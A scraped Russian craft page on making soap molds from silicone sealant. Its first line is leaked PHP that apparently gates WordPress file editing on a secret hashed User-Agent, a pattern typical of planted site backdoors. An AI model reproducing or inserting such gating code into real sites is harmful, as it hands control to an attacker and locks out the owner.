if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Делаем форму из силикона | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Как самому создать формочки для мыла

Чтобы добавить большей эксклюзивности своему мылу, вы можете создать формочки сами, использовав для этого силиконовый герметик

Что­бы доба­вить боль­шей экс­клю­зив­но­сти сво­е­му мылу, вы може­те создать фор­моч­ки сами, исполь­зо­вав для это­го сили­ко­но­вый гер­ме­тик. Что­бы орга­ни­зо­вать изго­тов­ле­ние мыла в домаш­них усло­ви­ях, необ­хо­ди­мо начи­нать с про­стых форм. После того как вы пой­мё­те все нюан­сы это­го дела, перей­дё­те на более слож­ные объекты.

При созда­нии фор­мы с помо­щью гер­ме­ти­ка, необ­хо­ди­мо учи­ты­вать, что он име­ет рез­кий запах, пока не засты­нет. Так что если вы не може­те пол­но­стью открыть окна, для про­вет­ри­ва­ния, при­дёт­ся тер­петь или отка­зать­ся от это­го спо­со­ба. Так­же луч­ше что­бы дома были толь­ко вы, пото­му что дру­гие чле­ны вашей семьи, ско­рее все­го, не захо­тят мирить­ся с запахом.

Сде­лать фор­му для мыла сво­и­ми рука­ми с нуля мож­но из любых форм: из неокра­шен­ных деко­ра­тив­ных све­чей, фар­фо­ро­вых фигу­рок, стек­лян­ных изде­лий, одна­ко, их необ­хо­ди­мо перед рабо­той сма­зать вазе­ли­ном, что­бы ком­паунд после засты­ва­ния хоро­шо отста­вал. Отлич­ным вари­ан­том явля­ет­ся пла­сти­лин. Фигур­ку из него, жела­тель­но подер­жать в моро­зиль­ной каме­ре, что­бы он стал твёр­дым, а затем уже начи­нать работу.

Что­бы всё осу­ще­ствить на прак­ти­ке, вам пона­до­бит­ся: гер­ме­тик сили­ко­но­вый, ёмкость немно­го боль­шей фор­мы, по кото­рой будет делать­ся сле­пок, жид­кое мыло, скотч, тряп­ка, и что-то режущее.

При выбо­ре фор­мы для мыла, необ­хо­ди­мо под­би­рать такие объ­ек­ты, что­бы их мож­но было выта­щить из фор­мы  без види­мых повре­жде­ний. Ведь когда поверх­ность пори­стая, или име­ет мно­го очень мел­ких дета­лей, то при вытя­ги­ва­нии мыла из такой фор­мы, вся эта мелочь может отло­мить­ся, или не пол­но­стью отпе­ча­тать­ся. Толь­ко когда вы пой­мё­те, как мож­но сохра­нить все эле­мен­ты, начи­най­те услож­нять фигурки.

й6

Когда вы буде­те делать мыло в домаш­них усло­ви­ях, мож­но при­ме­нить метод посте­пен­но­го покры­тия фигур­ки сили­ко­но­вым гер­ме­ти­ком. Вы берё­те объ­ект фигур­ку, кото­рой вы хоти­те отоб­ра­зить в мыле, кре­пи­те её на стек­ло или кера­ми­че­скую плит­ку, и посте­пен­но слой за сло­ем покры­ва­е­те гер­ме­ти­ком. Если покрыть фигур­ку сра­зу тол­стым сло­ем, тогда она будет очень дол­го сох­нуть. Слои необ­хо­ди­мо нано­сить тон­ким шаром, и ждать пока он под­сох­нет, затем сле­ду­ю­щий и так далее. Что­бы не повре­дить основ­ную часть фор­мы при отде­ле­нии от под­став­ки исполь­зуй­те тон­кие нож­ни­цы или что-то подоб­ное – я исполь­зо­ва­ла пилоч­ку, потом про­сто её отмы­ла. Сам гер­ме­тик ста­рай­тесь брать такой, что­бы он мог выдер­жать после засы­ха­ния тем­пе­ра­ту­ру мини­мум в 100 гра­ду­сов, был проч­ным и по воз­мож­но­сти без запаха.

й7

Вна­ча­ле, что­бы сва­рить и офор­мить мыло сво­и­ми рука­ми, для начи­на­ю­щих луч­ше всё делать посте­пен­но, осва­и­вая шаг за шагом. Это необ­хо­ди­мо для того, что­бы вы поня­ли, как ингре­ди­ен­ты вза­и­мо­дей­ству­ют меж­ду собой и фор­мой. Так­же важ­но знать, в каком поряд­ке вам нуж­ны инстру­мен­ты, и какие будут наи­бо­лее удоб­ны для это­го дела. Глав­ное здесь — практика!

й8


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Izgoiya

Люблю все делать своими руками. Вот и мыловарение не обошел стороной. Здесь разместил статьи про формы для мыла :) Читайте все мои записи!